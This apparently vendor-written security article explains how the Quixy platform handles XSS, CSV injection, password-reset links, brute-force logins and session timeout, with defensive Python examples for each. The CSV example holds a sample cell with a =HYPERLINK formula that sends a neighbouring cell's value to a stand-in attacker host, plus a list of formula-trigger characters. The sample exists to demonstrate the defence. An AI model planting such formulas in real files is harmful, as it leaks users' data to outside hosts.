Vulnerability Assessment and Penetration Testing (VAPT) is a critical part of ensuring the security of any software application. In Quixy, we have implemented specific measures to address the classes of vulnerability that such testing most often uncovers.
In this article, we discuss the common web application security risks that apply to the Quixy platform and how we have handled each of them.
Cross-Site Scripting (XSS)
One of the most common vulnerabilities in web applications is Cross-Site Scripting (XSS). Through the Rich Text Editor (RTE), a user could inject malicious scripts that would then execute in the browsers of other users viewing the content, compromising the platform's security. To prevent this, we have implemented an allow-list (white-list) approach where only certain HTML tags are accepted by the RTE; anything outside the list is stripped. See the list...
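To make the allow-list idea concrete, here is an added example of a tag allow-list sanitizer written for this article; it is not Quixy's code and the tag list in it is hypothetical (the real list is the one referenced above). It shows the two checks a practitioner wants beyond the tag name itself: attributes are also allow-listed (so event handlers such as onclick never survive) and href values are checked for a safe URL scheme after stripping the tab and newline characters that browsers ignore.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allow-list for illustration only; Quixy's actual tag list is not shown here.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "strong", "em", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href", "title"}}            # no style=, no on*= anywhere
SAFE_URL_SCHEMES = {"", "http", "https", "mailto"}  # "" covers relative links
VOID_TAGS = {"br"}
DROP_WITH_CONTENT = {"script", "style"}             # drop the element and its text


def _safe_href(value):
    # Browsers ignore tab/CR/LF inside a URL, so "java\tscript:" must be
    # collapsed before the scheme check or it would pass as a relative link.
    collapsed = "".join(ch for ch in value if ch not in "\t\r\n").strip()
    return urlparse(collapsed).scheme.lower() in SAFE_URL_SCHEMES


class AllowListSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self._out = []
        self._open = []        # allowed tags still awaiting a close tag
        self._skip = None      # name of a script/style element being discarded

    def handle_starttag(self, tag, attrs):
        if self._skip:
            return
        if tag in DROP_WITH_CONTENT:
            self._skip = tag
            return
        if tag not in ALLOWED_TAGS:
            return             # unknown tag dropped, its text children kept
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue       # this is where onclick=, onerror=, style= are dropped
            if name == "href" and not _safe_href(value):
                continue       # javascript:, data:, vbscript: links dropped
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self._out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self._open.append(tag)

    def handle_endtag(self, tag):
        if self._skip:
            if tag == self._skip:
                self._skip = None
            return
        if tag in self._open:
            while self._open:  # close any inner tags left open by bad input
                closed = self._open.pop()
                self._out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        if not self._skip:
            self._out.append(escape(data, quote=False))

    # comments, <!DOCTYPE> and processing instructions: default handlers drop them

    def result(self):
        while self._open:
            self._out.append(f"</{self._open.pop()}>")
        return "".join(self._out)


def sanitize_html(untrusted):
    """Return HTML containing only allow-listed tags, attributes and URL schemes."""
    parser = AllowListSanitizer()
    parser.feed(untrusted)
    parser.close()
    return parser.result()
```

Run the content through sanitize_html on the server before it is stored, not only in the browser, since an attacker can bypass any client-side editor and submit raw HTML directly to the API.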
CSV/Excel Upload
Another common web application risk relates to file uploads and downloads. Attackers can inject spreadsheet formulas into CSV cells (CSV injection); when the exported file is opened in a spreadsheet application, the formulas execute and can be used to steal server or user information. To prevent this, we have restricted formulas in file uploads (such as Excel files) and downloads.
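The following added example, written for this article rather than taken from Quixy, shows both sides of that restriction: on upload, locating cells that a spreadsheet would evaluate so the file can be rejected, and on download, neutralizing such cells with a leading single quote so they are stored as text. The sample CSV is constructed for the example; the trigger characters follow the OWASP CSV Injection guidance, and the number check avoids mangling ordinary negative values.

```python
import csv
import io

# Leading characters that make Excel, LibreOffice or Google Sheets evaluate a
# cell as a formula instead of displaying it (OWASP "CSV Injection").
FORMULA_TRIGGERS = "=+-@"

# Constructed upload sample, not real customer data. Row 2 leaks the
# neighbouring cell through a hyperlink; row 3 hides a formula behind a tab.
UPLOAD_SAMPLE = (
    "name,balance,note\n"
    "alice,-12.50,paid in full\n"
    'mallory,0,"=HYPERLINK(""http://attacker.example/?""&B2,""click"")"\n'
    'trent,0,"\t@SUM(B2:B3)"\n'
)


def _is_plain_number(text):
    """'-12.50' and '+3' are numbers, not formulas, and must not be mangled."""
    try:
        float(text)
        return True
    except ValueError:
        return False


def looks_like_formula(cell):
    """True if a spreadsheet would evaluate this cell rather than display it.
    Leading whitespace (including tab and CR, which some applications strip
    before evaluating) is removed first so a tab-prefixed formula is still caught."""
    stripped = cell.lstrip()
    if not stripped or _is_plain_number(stripped):
        return False
    return stripped[0] in FORMULA_TRIGGERS


def find_formula_cells(rows):
    """Upload path: report every cell that should make the file be rejected,
    as (row_index, column_index, cell) so the user can be told where."""
    return [(r, c, cell) for r, row in enumerate(rows)
            for c, cell in enumerate(row) if looks_like_formula(cell)]


def neutralize_cell(cell):
    """Download path: a leading single quote forces the cell to be stored as
    text; the original content is kept intact after the quote."""
    return "'" + cell if looks_like_formula(cell) else cell


def export_safe_csv(rows):
    """Serialise rows with every formula-like cell neutralised. QUOTE_ALL keeps
    embedded commas, quotes and newlines from breaking out of the cell."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(str(cell)) for cell in row])
    return buf.getvalue()


def parse_csv(text):
    return list(csv.reader(io.StringIO(text)))
```

Note that the danger is in the spreadsheet that opens the file, not in the web application itself, which is why the export side has to be protected even when the stored data was never executable on the server.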
Reset Password Link
Reset password links can also be exploited by attackers to gain unauthorized access to the platform if a link is intercepted or reused. In Quixy, a reset link is valid only for a limited time and can be used only once; once it has been used or has expired, the link is rejected. This ensures that only the user who requested the reset can change the password on their account.
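Here is an added example, not Quixy's implementation, of a reset-token service that enforces those two properties: a token expires after a fixed window and is consumed on first use. The 15-minute window is an assumption for illustration, since the article only says "a limited time". Only a SHA-256 digest of each token is stored, so a copy of the database does not yield working links, and issuing a new token invalidates any earlier one for the same user.

```python
import hashlib
import secrets
import time

# Assumption: the page says the link is valid "for a limited time" but gives no
# figure; 15 minutes is used here for illustration.
RESET_TTL_SECONDS = 15 * 60


class PasswordResetService:
    """Issues reset tokens that expire and work exactly once.

    Only a SHA-256 digest of each token is kept server-side: the token itself
    is 256 bits of randomness, so the digest cannot be brute-forced back to a
    token and a leaked store does not yield working links.
    """

    def __init__(self, clock=time.time):
        self._clock = clock            # injectable so expiry can be tested
        self._pending = {}             # token digest -> (user_id, expires_at)

    @staticmethod
    def _digest(token):
        return hashlib.sha256(token.encode("utf-8")).hexdigest()

    def issue(self, user_id):
        """Create a token for user_id, invalidating any earlier one for the
        same user so that only the most recently emailed link works."""
        self._purge_expired()
        self._pending = {d: rec for d, rec in self._pending.items() if rec[0] != user_id}
        token = secrets.token_urlsafe(32)
        self._pending[self._digest(token)] = (user_id, self._clock() + RESET_TTL_SECONDS)
        return token                   # goes into the emailed link; never stored in clear

    def redeem(self, token):
        """Return the user_id the token belongs to, or None. pop() makes the
        token single-use whether or not it turns out to be valid."""
        record = self._pending.pop(self._digest(token), None)
        if record is None:
            return None
        user_id, expires_at = record
        if self._clock() > expires_at:
            return None                # expired: already removed, cannot be retried
        return user_id

    def _purge_expired(self):
        now = self._clock()
        self._pending = {d: rec for d, rec in self._pending.items() if rec[1] >= now}
```

The redeem step should happen only when the user actually submits the new password, not when the link is merely opened, otherwise an email scanner or link preview that fetches the URL would consume the token before the user gets to it.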
Brute Force Attack
Brute force attacks are another common threat, in which attackers attempt to gain access to the platform by repeatedly guessing user credentials. To prevent this, we have implemented a blocking mechanism: a user account is blocked after three unsuccessful login attempts.
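As an added illustration (example code written for this article, not Quixy's login code), the block below shows a per-account failure counter that locks the account after three failures, matching the figure above. The lockout duration of 15 minutes and the sample user store are assumptions. It also shows two details a practitioner would want: the lock is checked before the password so a blocked account gives no further oracle, and unknown usernames are processed with a dummy record so response timing does not reveal which accounts exist.

```python
import hashlib
import hmac
import os
import time

MAX_FAILED_ATTEMPTS = 3          # as stated above: blocked after three failures
LOCKOUT_SECONDS = 15 * 60        # assumption: the page does not say how long a block lasts


def hash_password(password, salt=None):
    """PBKDF2-HMAC-SHA256; returns (salt, digest). Iteration count kept modest
    so the example runs quickly; production would use a higher setting."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)
    return salt, digest


# Constructed sample store (username -> (salt, digest)); not real accounts.
USERS = {"alice": hash_password("correct horse battery staple")}
# Used for unknown usernames so that the work done, and so the response time,
# is the same whether or not the account exists.
DUMMY_RECORD = hash_password("not-a-real-password")


class LoginThrottle:
    """Per-account failure counter with a temporary lock. Keeping the lock
    temporary limits the denial of service an attacker could cause by
    deliberately failing logins against someone else's account."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._failures = {}      # username -> consecutive failure count
        self._locked_until = {}  # username -> unix time the lock expires

    def is_locked(self, username):
        until = self._locked_until.get(username)
        if until is None:
            return False
        if self._clock() >= until:
            # lock expired: clear it and give the account a fresh counter
            del self._locked_until[username]
            self._failures.pop(username, None)
            return False
        return True

    def record_failure(self, username):
        count = self._failures.get(username, 0) + 1
        self._failures[username] = count
        if count >= MAX_FAILED_ATTEMPTS:
            self._locked_until[username] = self._clock() + LOCKOUT_SECONDS

    def record_success(self, username):
        self._failures.pop(username, None)


def attempt_login(throttle, users, username, password):
    """Returns 'locked', 'ok' or 'denied'. The lock is checked first so that
    a blocked account does not confirm or deny the guessed password."""
    if throttle.is_locked(username):
        return "locked"
    record = users.get(username)
    salt, expected = record if record is not None else DUMMY_RECORD
    _, supplied = hash_password(password, salt)
    if record is not None and hmac.compare_digest(supplied, expected):
        throttle.record_success(username)
        return "ok"
    throttle.record_failure(username)
    return "denied"
```

A lockout counter on its own does not stop an attacker who tries one common password against many accounts (password spraying), so per-source-IP rate limiting is the usual companion control.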
Session Timeout
Session timeout is a security best practice. An attacker who steals a session cookie from the browser could use it to gain unauthorized access to the platform, so the useful lifetime of a stolen cookie has to be limited. To achieve this, we have implemented an idle session timeout: the user is logged out after a certain amount of inactivity, after which the session cookie is no longer accepted.